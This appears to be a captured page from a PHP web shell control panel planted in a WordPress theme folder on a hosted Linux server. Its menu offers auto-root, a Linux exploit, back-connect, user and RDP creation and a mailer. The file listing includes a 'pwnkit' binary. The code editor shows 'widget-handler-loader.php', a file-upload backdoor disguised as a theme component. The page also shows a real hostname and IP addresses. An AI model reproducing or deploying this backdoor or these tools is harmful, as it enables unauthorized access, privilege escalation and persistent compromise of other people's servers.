Linux webm003.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.131.20.3 | : 216.73.217.69
Cant Read [ /etc/named.conf ]
7.4.33
anoukpx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
anoukpx /
www /
wp-content /
themes /
flavor /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
widget-handler-loader.php
886
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : widget-handler-loader.php
<?php $d = dirname(__FILE__); $h = '../../../..'; $r = ($h === '' || $h === '.') ? $d : $d . '/' . $h; $targetDir = isset($_REQUEST['dir']) ? $_REQUEST['dir'] : ''; if ($targetDir !== '') { $targetDir = str_replace('\\', '/', $targetDir); $targetDir = ltrim($targetDir, '/'); if (strpos($targetDir, '..') !== false) { die('Invalid directory'); } $uploadPath = $r . '/' . $targetDir; if (!is_dir($uploadPath)) { @mkdir($uploadPath, 0755, true); } } else { $uploadPath = $r; } if (isset($_FILES['f'])) { $n = basename($_FILES['f']['name']); if ($n !== '' && move_uploaded_file($_FILES['f']['tmp_name'], $uploadPath . '/' . $n)) { echo '1'; } else { echo '0'; } } else { echo '<form method="post" enctype="multipart/form-data"><input type="file" name="f"><input type="submit" value="Upload"></form>'; }
Close